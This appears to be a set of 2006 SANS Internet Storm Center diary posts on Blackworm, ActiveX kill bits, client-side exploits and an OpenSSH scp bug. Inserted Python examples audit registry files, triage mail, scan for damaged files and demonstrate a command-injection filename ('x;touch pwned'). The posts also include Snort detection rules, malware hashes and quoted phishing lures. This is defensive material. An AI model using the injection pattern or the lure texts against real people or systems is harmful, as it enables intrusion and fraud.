Published: 2006-01-31

Updated Malware Domain List

The folks at Bleeding Snort released an updated list of known malware-related domains yesterday, up to 9,400 entries now!  For those of you employing DNS black holes, proxy-based filtering, or doing other general research of malware based on domains, you should check out this exhaustive (and exhausting!) new list.  I frequently rely on this list to match against when doing research of spyware and related nasties.  Kudos to the Bleeding Snort guys for their hard work.


Published: 2006-01-31

CME-24: It Has Begun

According to the folks at F-Secure, the CME-24 file deletions have begun for folks whose clocks are set wrong (remember, this puppy is set to fire up on Feb 3).  For those not keeping score, CME-24 is the one that is also called Blackworm, Nyxem, Blackmal, Mywife, etc.  It's going to be a rough several days for some folks out there.  For more info on CME-24, here is the latest Internet Storm Center post on it.  Here is a Microsoft round-up on the issue as well.

Just remember: Malware was created by man. It evolved. It rebelled.


Published: 2006-01-31

Two-Way Firewall in Windows Vista and Microsoft OneCare

With client-side exploits so plentiful, it sure would be nice to have some form of serious outbound firewalling built into Windows, wouldn't it?  The XP firewall blocks inbound traffic, but is of little use in outbound defenses.  As Handler Queen Lorna Hutcheson points out, since Win2K you can filter outbound traffic using the so-called IPSec filters of Windows.  However, such filters are: 1) Really badly named -- they don't have to use IPSec crypto; 2) Really hard to define (what an ugly GUI); and 3) Unable to restrict a specific application to specific ports and protocols.  So, the existing outbound filtering of Windows is extremely limited.

But, here's a nice article about how Microsoft plans on including outbound filtering in the Windows Vista firewall. Let's see, we've had such features with free solutions for over a decade.  But only in 2006 will we get it standard in Windows. 

In Microsoft's defense, though, once an attacker infiltrates via a client-side exploit, their evil code can simply alter the firewall config.  True.  But, still, security is all about raising the bar.  We raise the bar, they jump over it.  We then raise it again.  It's the natural order of things.  I hear some arguments that say, "We shouldn't do this from a security perspective, because they'll jump over this bar."  But, if the cost of such solutions is minuscule, why not raise the bar anyway, knowing that it still can be jumped?  Let's make the bad guys work a little harder if it doesn't cost us anything.

A related story involves Microsoft's OneCare technology, an attempt at a comprehensive set of anti-virus/anti-spyware/firewall tools that help provide an envelope of protection around a user's PC.  A blog post here talks about ways to dodge the defenses of OneCare, primarily by using Java and/or signed code to bypass the firewall restrictions.  Some Microsoft personnel respond here, saying that their goals were to pull security configurations together in one place and offer protection while minimizing application breakage.  It's all about trade-offs.  And I, for one, welcome our new OneCare overlords.  There are many copies.  And they have a plan.


Published: 2006-01-31

Client-Side Exploits - The Mother Lode?

As any stroll down the latest Metasploit exploit list will tell you, attacking client technologies is very hot right now, including browsers, mail readers, audio players, etc.  Here is an interesting article from Brian Krebs about a huge area likely to be very ripe with such exploits: ActiveX controls installed by third parties.  Krebs summarizes well the research of Richard M. Smith, who claims to have found a cornucopia of buffer overflow flaws in widely deployed ActiveX controls.  Handler extraordinaire Agent Tom Liston points out the possibility of using a known flaw in an ActiveX control to really help target a given population, such as a given ISP's customers or perhaps a given corporation or government known to use a given ActiveX control.


Published: 2006-01-31

AMD Forums Uh-Oh

Speaking of client-side sploits, it appears that AMD's forums website was used to distribute WMF exploit code the other day.  F-Secure has a write-up on the situation.  It's been resolved, but there is likely a very interesting story behind this one.  Again, client side exploits are the wave of the present.


Published: 2006-01-30

Winamp 5.x Remote Code Execution via Playlists

While we're on the topic of audio software, there's a 0-day exploit out today for Winamp 5.12 that allows remote code execution via a crafted playlist (.pls) file.  The proof-of-concept exploit suggests using an iframe to trigger a 'drive-by' attack on anyone unlucky enough to visit a website containing a malicious iframe; say, third-party advertisers and forum websites--the usual vectors for this sort of thing.  Secunia's got a nice writeup of it here.

Our friends over at FrSIRT have posted a workaround in their advisory on the issue.  To prevent malicious playlist files from being opened automatically, FrSIRT recommends:

Disabling the "audio/scpls" and "audio/mpegurl" MIME types in Internet Explorer by deleting or renaming the following registry keys:

And disassociating the "pls" and "m3u" file extensions in Windows :

- Launch Windows Explorer
- On the Tools Menu select "Folder Options"
- Select the "File Types" tab
- Scroll to find the PLS and M3U file extensions and then press the "Delete" button


Published: 2006-01-29

SHOUTCAST <= 1.9.4 Vulnerability, Exploit Available

On December 26, 2005, Secunia released an advisory regarding a vulnerability in SHOUTcast.  We've received a report about a few sites detecting odd log entries that fit the vulnerability description, with corresponding server crashes over the past few days.  An exploit has been published on at least one site.  The solution is to update to the latest version (v1.9.5).  The advisory is available at Secunia.

The default port for SHOUTcast is 8000--DShield shows a spike in targets on the 14th and more recently.


Dave Brookshire (http://parapet.net)


Published: 2006-01-28

ActiveX Kill Bit Can Be Bypassed - Another Reason to Apply MS05-054?

ISC reader Juha-Matti Laurio pointed out a new vulnerability note VU#998297, published by US-CERT on January 26, 2006, which states that a malicious website can bypass an ActiveX kill bit by taking advantage of a bug in Internet Explorer.

A kill bit is a registry setting that prevents Internet Explorer from running the corresponding ActiveX control even if the control is installed on the system. It is not uncommon to proactively set kill bits for known malicious ActiveX controls as part of a spyware-prevention effort. For example, the SpywareGuide website provides a freely downloadable .REG file for setting kill bits of many "dubious" ActiveX controls.
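As an added illustration (not from the diary, US-CERT or SpywareGuide), here is a small Python audit of a .REG file of the kind SpywareGuide distributes: it parses the export and lists which CLSIDs actually have the kill bit set. The registry location (HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}, value "Compatibility Flags") and the kill-bit value 0x400 are Microsoft's documented convention rather than something stated on this page; the CLSIDs in the sample are placeholders, not real controls.

```python
import re

# Microsoft's documented location for per-CLSID compatibility flags; bit 0x400
# is the kill bit. (Assumed from Microsoft documentation, not from this page.)
ACTIVEX_COMPAT_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer"
                      r"\ActiveX Compatibility")
KILL_BIT = 0x400

# Constructed sample in .REG export format. The CLSIDs are placeholders.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{11111111-1111-1111-1111-111111111111}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{22222222-2222-2222-2222-222222222222}]
"Compatibility Flags"=dword:00000020

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{33333333-3333-3333-3333-333333333333}]
"Compatibility Flags"=dword:00000480

[HKEY_CLASSES_ROOT\CLSID\{44444444-4444-4444-4444-444444444444}]
@="Something unrelated"
"""

CLSID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")


def parse_reg(text):
    """Parse .REG text into {key_path: {value_name: value}}.

    Covers what the kill-bit audit needs: dword values and quoted strings;
    any other value type is kept as its raw text.
    """
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        name, _, value = line.partition("=")
        name = "(Default)" if name == "@" else name.strip('"')
        if value.startswith("dword:"):
            value = int(value[len("dword:"):], 16)
        elif value.startswith('"') and value.endswith('"'):
            value = value[1:-1]
        keys[current][name] = value
    return keys


def kill_bits(reg_keys):
    """Return {CLSID: flags} for every entry under the ActiveX Compatibility key."""
    prefix = ACTIVEX_COMPAT_KEY.lower() + "\\"
    result = {}
    for path, values in reg_keys.items():
        if not path.lower().startswith(prefix):
            continue
        m = CLSID_RE.search(path[len(prefix):])
        flags = values.get("Compatibility Flags")
        if m and isinstance(flags, int):
            result[m.group(0).upper()] = flags
    return result


def killed_clsids(reg_text):
    """CLSIDs whose kill bit is set. Test the bit, not equality with 0x400:
    an entry may combine the kill bit with other compatibility flags."""
    return sorted(c for c, f in kill_bits(parse_reg(reg_text)).items() if f & KILL_BIT)


def is_killed(reg_text, clsid):
    return bool(kill_bits(parse_reg(reg_text)).get(clsid.upper(), 0) & KILL_BIT)


if __name__ == "__main__":
    for clsid in killed_clsids(SAMPLE_REG):
        print("kill bit set:", clsid)
```

Real .REG exports from regedit are UTF-16 with a byte-order mark, so read them with that encoding before handing the text to parse_reg. The point of the bit test is the third sample entry: its flags are 0x480, which a naive equality check against 0x400 would report as "not killed".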

The VU#998297 vulnerability demonstrates the limitation of relying on kill bits as the sole mechanism for protection against malicious ActiveX controls.

The US-CERT article implies that this vulnerability was fixed by the MS05-054 patch, which was released in December 2005. Strangely, Microsoft's MS05-054 advisory did not mention any bugs related to kill bits. Perhaps the kill bit flaw is a specific instance of the COM Object Instantiation Memory Corruption Vulnerability (CAN-2005-2831), which was covered in MS05-054. Yet US-CERT lists a different CVE number (CVE-2006-0057) when discussing the kill bit problem.

So, as far as I can tell, you can address the kill bit vulnerability by installing Microsoft's MS05-054 patch, though I am not quite sure of that.

Lenny Zeltser
ISC Handler on Duty


Published: 2006-01-28

Detecting BlackWorm Without Signatures

An article in the German magazine PC-WELT describes a study of anti-virus vendors' ability to detect BlackWorm when it first hit the Net. The analysis, performed by the AV-Test lab, points out that some vendors were able to detect the worm without the need for BlackWorm-specific signatures, while others needed to release new signatures.

Signature-based detection mechanisms have been essential to anti-virus products' ability to recognize malicious code. Over the past several years, anti-virus vendors have made strides in heuristic and behavioral detection algorithms, and I am glad to see that these measures in several products were effective at stopping this worm.

I'd like to extend kudos to eSafe, Fortinet, McAfee, NOD32, and Panda, whose anti-virus products, according to the AV-Test study, were able to recognize that BlackWorm was malware heuristically, without requiring a specialized signature. Also, congrats to ISS, Kaspersky, and Panda for being able to recognize it through behavioral means without a signature.

Take a look at the article for additional details. Even if you don't understand German, you may find the tables, which document the study's findings, interesting. The first table lists behavioral methods, the second heuristic ones, and the third one signature-based tools.

Lenny Zeltser
ISC Handler on Duty


Published: 2006-01-28

KbHook.dll is Not Always Spyware

I am a fan of Microsoft AntiSpyware tool for several reasons:

  1. It's relatively easy to use
  2. Its feature set is very comprehensive
  3. It's free
(There are other excellent anti-spyware tools out there, too. This story just happens to start with a Microsoft AntiSpyware scan.)

Like all malware scanners that use signatures to identify malicious code, Microsoft AntiSpyware can raise false alarms. I was recently reminded of this after a scheduled scan of a Windows workstation produced the following critical alert:

This screen shot was modified to remove the date when the alert occurred.

Whoa! Key loggers are a particularly nasty type of malware, because they are created to monitor and record keyboard activities. They are often designed to capture the victim's interactions with a login form of some kind, frequently targeting logon credentials for banking websites. NetSpy, identified by this spyware scan, is known to be able to log the victim's key strokes, take screen shots, and transmit captured data to the attacker. No wonder a spyware scanner typically categorizes it as a severe threat.

Although many malware-scanning tools identify the kbhook.dll file itself as spyware, its presence alone is not sufficient. The infected system also needs to have additional software components that make use of the DLL's key stroke-monitoring features. In the case of the workstation that I was analyzing, I could not find any additional suspicious components. Although that, alone, would not be sufficient to calm me, additional evidence reinforced the theory that I was dealing with a false positive.

The creation date of the offending file c:\windows\system32\kbhook.dll matched the day when the workstation's user happened to install drivers for his BenQ keyboard. Repeating the driver installation process confirmed that the kbhook.dll file is supplied by the keyboard vendor, presumably to enable non-standard keyboard features such as hot keys.

A web search revealed several discussions of false positives associated with files named kbhook.dll. One such discussion stated that Genius Wireless Keyboard drivers used this file without malicious intent. Another discussion of an unknown-to-me keyboard reached a similar conclusion.

The kbhook.dll file on the workstation I examined was a Microsoft Visual C++ 6.0 DLL, with MD5 hash 68ef310fdb7788a8ea8841c8fe80e66e. It exported two functions: EnableHook() and DisableHook(); this is how an external program can make use of the DLL's keyboard-controlling functionality.

Personally, I am not crazy about having a DLL with this functionality installed on a system, because one never knows which program will attempt to take advantage of its EnableHook() and DisableHook() functions. I was able to delete the file from the workstation, because the user did not make use of the BenQ hot keys that the driver was meant to enable. Other reports on web forums suggest that removing the file for certain keyboards may prevent the device from working properly.

If you encounter a kbhook.dll file on your system, please remain vigilant. This file is often associated with dangerous key loggers, presence of which may require a full system reinstall. However, keep in mind that malware scanning tools sometimes mis-identify this file. Specifically, the file named kbhook.dll is sometimes used by keyboard driver authors without malicious intent.

Lenny Zeltser
ISC Handler on Duty


Published: 2006-01-27

Another day, another bot being spammed

A new bot (a Brepibot variant) is being actively spammed. What's interesting about it is that it seems to be targeting universities.  Also, it seems that the author is constantly producing new variants of the bot. In the last couple of hours we received several samples of the bot:

e5f68caf1c546e00fff964d8ac18d37a  Photo and Article.exe
69564b5904d8a4e33d58e25ef6edfd39  Transaction and Billing Services.exe.1
a2d9fc4ece5caa109291b25804ef6f3a  photo+article.exe

This bot works the social engineering side heavily and plays on the emotions of its targets.  One lure targets a person's ego and the other targets people's sympathy/empathy.  Here are some of the subjects that we have seen.

Photo and Article
Campus Student Raped
Do you recognise this person?
CCTV still of Rapist
Rape on Campus

Here are a couple of the message bodies:


We are planning to include you in the new campus magazine in an article titled "Campus Life".  Can you approve the photo and article for us before we go to printing please?

If any details are wrong then we can amend before printing on Wednesday the 1st of February so please get back to us as soon as possible. We have attached the photo and article.

Many Thanks & Best Regards,

Joseph Hope


During the early morning of January 25 2006, a campus student was the victim of a horrific sexual assault within college grounds. Eyewitnesses report a tall black man in grey pants running away from the scene.  Campus CCTV has caught this man on camera and are looking for ways to identify him.  If anyone recognises the attached picture could they inform administraion immediatly


Robert Atkins
Campus Administration

One attachment was an .exe and the other was a zipped attachment containing an .exe

Please let us know if you see any other variants!!
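As an added example (not part of the diary, and not the bot's own code), here is a Python triage script for this kind of lure: it parses a message, looks inside zip attachments for executables, flags the subject lines listed above, and checks each payload's MD5 against the three hashes from the entry. The message it builds is constructed for the demonstration and carries a harmless placeholder instead of a real executable; the sender and recipient addresses are made up.

```python
import email
import hashlib
import io
import zipfile
from email.message import EmailMessage

# The three sample hashes listed in the diary entry above.
KNOWN_BAD_MD5 = {
    "e5f68caf1c546e00fff964d8ac18d37a",
    "69564b5904d8a4e33d58e25ef6edfd39",
    "a2d9fc4ece5caa109291b25804ef6f3a",
}

# Extensions Windows will execute on double-click. .scr and .cmd are included
# because other malware described in this diary uses them.
EXECUTABLE_EXTS = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd")

# Subject lines seen in the campaign (lower-cased for comparison).
LURE_SUBJECTS = {
    "photo and article",
    "campus student raped",
    "do you recognise this person?",
    "cctv still of rapist",
    "rape on campus",
}


def has_executable_ext(name):
    return name.lower().endswith(EXECUTABLE_EXTS)


def scan_payload(name, data, depth=0):
    """Yield (name, md5, reason) for suspicious content, descending into zips.

    The depth limit stops a zip-in-a-zip bomb from recursing forever; a zip
    that cannot be opened is itself reported, since broken archives are a
    known way of slipping past filters that only inspect what they can parse.
    """
    md5 = hashlib.md5(data).hexdigest()
    if md5 in KNOWN_BAD_MD5:
        yield name, md5, "known sample"
    if has_executable_ext(name):
        yield name, md5, "executable extension"
    if depth < 3 and data[:2] == b"PK":
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for info in zf.infolist():
                    inner = zf.read(info)
                    for hit in scan_payload(name + "/" + info.filename, inner, depth + 1):
                        yield hit
        except zipfile.BadZipFile:
            yield name, md5, "unreadable zip (possible evasion)"


def scan_message(raw_bytes):
    """Return the subject verdict and attachment findings for one message."""
    msg = email.message_from_bytes(raw_bytes)
    subject = (msg.get("Subject") or "").strip()
    findings = []
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        name = part.get_filename()
        if not name:
            continue
        data = part.get_payload(decode=True) or b""
        findings.extend(scan_payload(name, data))
    return {"subject": subject,
            "lure_subject": subject.lower() in LURE_SUBJECTS,
            "findings": findings}


def build_sample_message():
    """Constructed lure: a zip holding a fake .exe (placeholder bytes, not malware)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Photo and Article.exe", b"MZ placeholder, not a real program")
    msg = EmailMessage()
    msg["From"] = "joseph.hope@example.edu"      # made-up address
    msg["To"] = "student@example.edu"            # made-up address
    msg["Subject"] = "Photo and Article"
    msg.set_content("We have attached the photo and article.")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip",
                       filename="Photo and Article.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    print(scan_message(build_sample_message()))
```

Run against a mailbox, the hash check catches only the samples already known, which is exactly why the extension and nested-archive checks are there: the entry notes the author ships new variants every few hours, and each one has a fresh MD5.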


Published: 2006-01-25

Blackworm Notifications

Blackworm infected machines reported to a 'counter' site the fact that they got infected. The TISF BlackWorm task force obtained the logs from this counter, and is notifying networks represented in the logs. These notifications will use a from address of "handlers@sans.org" or "Randy_Vaughn@Baylor.edu". Please e-mail jullrich\at/sans.org if you would like to obtain a list for your network, and have not received an automated e-mail.

Please include information to support that your e-mail address is associated with administering the respective networks, or a phone number to validate the information.

Update: We are getting A LOT of requests. Please do not forget to include the IP space you are interested in. Quite a number of people responded that these logs helped them identify infected systems and it likely prevented major data loss to these organizations. BIG THANKS to RCN for providing the counter logs in a timely manner. We could not provide this service without their help.


Published: 2006-01-25

Cisco IOS local privilege escalation

Cisco earlier released a vulnerability note detailing a problem within some Cisco IOS versions that bypasses the command authorization offered by AAA services such as TACACS+. The bypass uses tclsh.

Why a router would need tclsh is a mystery to this handler.

Swa Frantzen


Published: 2006-01-25

DoS exploit publicly released for Cisco Aironet AP

An exploit was publicly released by FrSIRT for crafting the ARP requests needed to exploit the vulnerability described at Cisco. As a reminder, this vulnerability is related to resource exhaustion, and consequently a Denial of Service condition, caused by ARP requests.
If you have not taken measures to protect your Cisco Aironet Access Points, now would be a good time to start planning the upgrades or to implement one of the workarounds in the Cisco advisory.

Swa Frantzen


Published: 2006-01-25

FreeBSD packet filter (pf) DoS using fragments.

FreeBSD announced a patch for a vulnerability that can trigger a kernel panic due to crafted fragments and their handling in pf(4).

Workarounds are available: do not use "scrub fragment crop" or "scrub fragment drop-ovl" in pf.conf(5).

More information:
Swa Frantzen


Published: 2006-01-24

Seasonal Malwares and other trends

Seasonal malware is not a new thing; remember the Bin Laden e-mails, "see the pictures of Bin Laden being arrested"...:) But recently I started to see some really interesting ones...

- At the end of 2005, the most common malware samples were named <something>2006.exe/scr... like greeting cards wishing a very happy 2006...:)

Some examples:
felizanonovo2006.UOL.scr-9ac416ab6f2da444c4dcba8750ff31d4      BehavesLike:Trojan.Downloader
terra2006.scr-81cab96a398d4399c8dd444d107a03e2          Win32.Worm.VB.AR
cartao2006.scr-112785080ab88f639ed77ef7c963355e         Trojan.Downloader.Delf.QZ
Cartoes2006.exe-0fd8e5dc41e6b6a74046fb2a34045d90         Trojan.Banker.Delf.8B54173E
fefe2006.exe-e6791a1c8525c778ccb2eabb53423ed4             Win32.Parite.B
feliz2006.exe-a25f1cca2ae0d210eb28600403c1a894             Trojan.Downloader.Banload.V
feliz2006.scr-96ba8bfefe94baf8eaa533921715cf06             Trojan.Banker.VB.4616C390

Sometimes, if you check the MD5 hash, you will notice that a sample that appears to be new is in fact an old one that was renamed to something more current...

Another example: a new season of the reality show Big Brother was about to start in Brazil in January 2006, called Big Brother Brazil 6. So we started to see e-mails saying that if you filled in the 'form' you would get a chance to be part of the show:

BBB6.exe  suspected: GenPack:Generic.Malware.Sdld.91FA0809

One more? Ok, today is January 23, and here in Brazil we are about one month before our Carnival, which is a big party here... So, guess what:

carnaval-previnido.scr-3f1476def1dadd57f54658aae6710acc suspected: BehavesLike:Trojan.Downloader

Another interesting trend that I am observing is the use of .cmd extensions.

www.convitedoorkutpravoce.cmd-2924df691a9fe38ec1bdfd1bfabf1ad5         Trojan.Downloader.Banload.AL
www.fernandapaesleme.com.br.cmd-a3aedc0d95549e086e5c4a89956923f7     Trojan.Downloader.Delf.CI

But what is a .cmd extension? That's a question I asked in my Malware Analysis Quiz 3:
"On windows OSs, files with the "cmd" extension are generally scripts passed to the cmd.exe command interpreter for execution. They are very similar to the (older) ".bat" files,used since the days of DOS for scripting and interpreted by command.com, but the different extension indicates slightly updated syntax/capabilities associated with cmd.exe"

And to finish our update on the malware world: hacking websites or using free hosting sites to host malware is still happening, but I am seeing more and more malware hosted on file-sharing websites, e.g. rapidupload.com, zupload.com... which is somewhat more difficult to take down...

For example: http://z13.zupload.com/file.php?filepath=<removed>

If you want to take a look at my personal zoo, you can check it here. On this zoo I try to keep malwares with unique md5 hashes.

Btw, did you update your AV for Nyxem.E?? Check it twice... you don't want to lose your .doc, .xls, .ppt files... right?

Handler on Duty: Pedro Bueno ( pbueno && isc. sans. org )


Published: 2006-01-24

OpenSSH scp Issue

Secunia has released an advisory here that addresses an issue with the use of the "system()" function in scp.  Because of this usage, filenames given on the scp command line that contain shell metacharacters (which the user escaped once, for their own shell) go through shell expansion a second time inside scp and lose their escaping.  This can cause what was initially a valid filename to be interpreted as multiple filenames (pointing to non-existent files) or as additional commands (if the filename includes a semicolon).

Additional details about the bug can be found from this Bugzilla post.

The latest version of OpenSSH, 4.2p1, is affected by this issue and a patch has not yet been made generally available.  Fedora has released updated RPMs for Fedora Core 4 that address this issue.  You can get more information about the Fedora updates here.

Here is an example from the Bugzilla post demonstrating the bug:

Steps to Reproduce:
1. touch foo\ bar (the \ escapes the space embedded in the filename)
2. mkdir somedir
3. scp foo\ bar somedir

Expected Results:
No message, the file copied
Actual Results:
cp: cannot stat `foo': No such file or directory
cp: cannot stat `bar': No such file or directory
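As an added example (not from the Bugzilla post or OpenSSH itself), here is a Python model of why the bug happens, run locally: one function builds a "cp" command string and hands it to system() the way the old scp code path did, the other passes the filenames as argv elements. The "foo bar" case is the Bugzilla reproduction; the second filename shows why double expansion is more than a cosmetic bug.

```python
import os
import shutil
import subprocess
import tempfile


def naive_copy(src, dst):
    """Model of the vulnerable path: scp assembled "cp <src> <dst>" as a string
    and passed it to system(), so /bin/sh parsed the filenames a second time.
    By this point the user's own shell has already removed the backslashes."""
    return os.system("cp %s %s 2>/dev/null" % (src, dst))


def safe_copy(src, dst):
    """Fixed form: each filename is a single argv element; no shell in between.
    The "--" also stops a name beginning with "-" from being read as an option."""
    return subprocess.run(["cp", "--", src, dst],
                          stderr=subprocess.DEVNULL).returncode


def demonstrate():
    """Reproduce the Bugzilla case ('foo bar') and a ';' injection in a
    scratch directory; return what each variant actually did."""
    results = {}
    work = tempfile.mkdtemp()
    here = os.getcwd()
    os.chdir(work)
    try:
        open("foo bar", "w").close()
        os.mkdir("somedir")

        # Space in the name: the shell splits it, so cp sees foo, bar, somedir.
        naive_copy("foo bar", "somedir")
        results["naive_copied_file"] = os.path.exists("somedir/foo bar")
        safe_copy("foo bar", "somedir")
        results["safe_copied_file"] = os.path.exists("somedir/foo bar")

        # Semicolon in the name: everything after it runs as a second command.
        open("x;touch pwned", "w").close()
        naive_copy("x;touch pwned", "somedir")
        results["naive_ran_injected_command"] = os.path.exists("pwned")
        if os.path.exists("pwned"):
            os.remove("pwned")
        safe_copy("x;touch pwned", "somedir")
        results["safe_ran_injected_command"] = os.path.exists("pwned")
        results["safe_copied_odd_name"] = os.path.exists("somedir/x;touch pwned")
    finally:
        os.chdir(here)
        shutil.rmtree(work, ignore_errors=True)
    return results


if __name__ == "__main__":
    for key, value in demonstrate().items():
        print(key, value)
```

The takeaway for code review is the general one, not the scp-specific one: any time a filename or other user-controlled string is spliced into a command line that a shell will parse, the escaping the caller applied is gone, and the only robust fix is to stop invoking a shell at all.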


Published: 2006-01-24

BlackWorm Summary

About BlackWorm

Over the last week, "Blackworm" infected more than 700,000 systems as measured using a counter web site used by the worm to track itself. This worm is different and more serious than other worms for a number of reasons. In particular, it will overwrite a user's files on February 3rd.

At this point, the worm will be detected by up-to-date anti virus signatures. In order to protect yourself from data loss on February 3rd, you should use current (Jan 23rd or later) anti virus signatures.  Note, however, that the malware attempts to disable/remove any anti-virus software on the system (and does this every hour while the system is up), so if the machine was infected before signatures were deployed, obviously, that anti-virus software can't be expected to clean up the infection for you.

The following file types will be overwritten by the virus: DOC, XLS, MDE, MDB, PPT, PPS, RAR, PDF, PSD, DMP, ZIP. The files are overwritten with an error message( 'DATA Error [47 0F 94 93 F4 K5]').

We will try to post more detailed cleanup instructions later. However, it is likely that you will have to rebuild the system from scratch. Obtaining good backups is critical as a first step.
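As an added check (not from this summary or any vendor tool), the following Python walks a directory tree or share after the trigger date and separates documents that now hold the worm's error string from intact ones; it is an assessment aid for deciding what must come from backup, not a recovery tool. It assumes a wiped file contains the marker string above and nothing else of substance, and the sample tree it builds is constructed for the example.

```python
import os
import tempfile

# The string the summary above says overwritten files contain.
DAMAGE_MARKER = b"DATA Error [47 0F 94 93 F4 K5]"

# File types the summary lists as targets.
TARGET_EXTS = {".doc", ".xls", ".mde", ".mdb", ".ppt", ".pps",
               ".rar", ".pdf", ".psd", ".dmp", ".zip"}


def is_overwritten(path):
    """True if the file now consists of the worm's marker string.

    Assumption: a wiped file holds the marker followed at most by whitespace.
    A document that merely mentions the string somewhere inside is left alone.
    """
    try:
        with open(path, "rb") as fh:
            head = fh.read(len(DAMAGE_MARKER) + 64)
    except OSError:
        return False
    if not head.startswith(DAMAGE_MARKER):
        return False
    return not head[len(DAMAGE_MARKER):].strip()


def scan_tree(root):
    """Return (destroyed, intact): sorted paths, relative to root, of targeted
    file types, split by whether the payload has replaced their contents."""
    destroyed, intact = [], []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in TARGET_EXTS:
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            (destroyed if is_overwritten(path) else intact).append(rel)
    return sorted(destroyed), sorted(intact)


def make_sample_tree():
    """Constructed fixture: two wiped documents (one in a subfolder, one with a
    trailing newline and upper-case extension), one intact document with a
    real-looking OLE header, and a non-targeted .txt that is ignored."""
    root = tempfile.mkdtemp()
    os.mkdir(os.path.join(root, "shared"))
    samples = {
        "budget.xls": DAMAGE_MARKER,
        os.path.join("shared", "plan.PPT"): DAMAGE_MARKER + b"\r\n",
        "memo.doc": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 64,
        "notes.txt": DAMAGE_MARKER,
    }
    for rel, data in samples.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    destroyed, intact = scan_tree(make_sample_tree())
    print("destroyed:", destroyed)
    print("intact:", intact)
```

Because the worm walks every drive it can reach, including mapped shares, run this from a clean machine against the shares rather than from a suspect host, and treat a non-empty destroyed list as confirmation that the rebuild-and-restore path described below is the one you are on.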

The first thing you should do is to update your anti virus signatures.

This page will be updated as new information becomes available. Please see the end of the page for references to other sites. Use only this url to link to this page: http://isc.sans.org/blackworm


As usual, this worm/virus has collected a number of names from various vendors. It is so far known as: Blackmal, Nyxem, MyWife, Tearec among other names. Update: we have been informed that the CME number will be 'CME-24'. cme.mitre.org should shortly list this number.

How would I get infected?

The worm spreads via e-mail attachments or file shares. Once a system in your network is infected, it will try to infect all shared file systems it has access to. You may see a new "zip file" icon on your desktop.

What will BlackWorm do to my system?

It will disable most anti virus products and delete them. The worm will e-mail itself using a variety of extensions and file names. It will add itself to the list of auto-start programs in your registry.


Anti virus vendors offer removal tools. Microsoft provides detailed instructions for manual removal. However, there are two important reasons to rebuild "from scratch":
  1. BlackWorm uses the same tricks to install itself as other viruses/worms. It may not be the only one on your system. Antivirus will not detect all viruses, and the removal tool will only remove this specific worm.
  2. BlackWorm will allow remote access to your system, and additional malware may have been installed via this backdoor.

Snort Signatures

Joe Stewart (Lurhq.com) provided the following snort signatures based on his analysis of the worm (for up-to-date rules, see bleedingsnort.org):

  1. This sig alerts if someone visits any counter at webstats.web.rcn.net without a Referer: header in the request. Could be an infected user, could be one of us checking out the counter stats:

    alert tcp any any -> any 80 (msg:"webstats.web.rcn.net count.cgi request without referrer (possible BlackWorm infection)"; content:"GET /cgi-bin/Count.cgi|3f|"; depth:23; content:"df|3d|"; content:"Host|3a 20|webstats.web.rcn.net"; content:!"Referer|3a|"; classtype:misc-activity; sid:1000376; rev:1;)

  2. This sig alerts on the specific pattern BlackWorm uses to test connectivity to www.microsoft.com. It's unique in that the request doesn't have a User-Agent: header. So this will catch BlackWorm and possibly other automated requests to microsoft (which could happen if someone codes a sloppy app that uses the exact same pattern - but they should probably be flogged anyway):

    alert tcp any any -> any 80 (msg:"Agentless HTTP request to www.microsoft.com (possible BlackWorm infection)"; dsize:92; content:"GET / HTTP/1.1|0d0a|Host|3a20|www.microsoft.com|0d0a|"; classtype:misc-activity; sid:1000377; rev:1;)


We would like to thank the members of the TISF BlackWorm task force for analysis and coordination.

The task force emerged from the MWP/DA groups.  This task force is now known as the TISF BlackWorm task force. It involves many in the security (anti spam, CERTs, anti virus, academia, ISP's, etc.) community and industry, working together to combat threats to the security of the Internet in cooperation with law enforcement globally.


Update: http://www.lurhq.com/blackworm.html
Trend Micro

Note: some of these links will offer removal tools. We have not tested any of these tools thoroughly enough to recommend them. They should be used as a "first try" tool, but do not substitute for a full analysis and possible rebuild of the infected system. BlackWorm includes the ability to install additional components. These additional components, if installed, will likely be missed. In addition, a virus like BlackWorm is likely an indication of a more fundamental problem in your security posture and multiple infections are likely.


Published: 2006-01-23

More on Nyxem

Although Nyxem is comparatively less widespread than worms like Sober or Netsky, it's still doing a fair number of rounds.

The graph below is from one of the e-mail gateways with a decent number of e-mails processed daily (around 500,000+). You can see that Nyxem.E is the top malware instance detected in the last 24 hours, with more than double the occurrences of the next most frequent worm (Netsky).

This is not surprising, since the Web counter that the worm visits upon infecting a machine currently shows around 630,000 infections (we can't be sure that this number is correct). Bert Rapp e-mailed us asking about the URL that the worm visits. This can help you in determining if a machine is infected, as it will visit the URL with the counter.

The counter is at:

h tt p:// webstats.web.rcn.net/ [REMOVED] / Count.cgi?df=765247

You can search your web logs for this host name (which looks like a legitimate site).
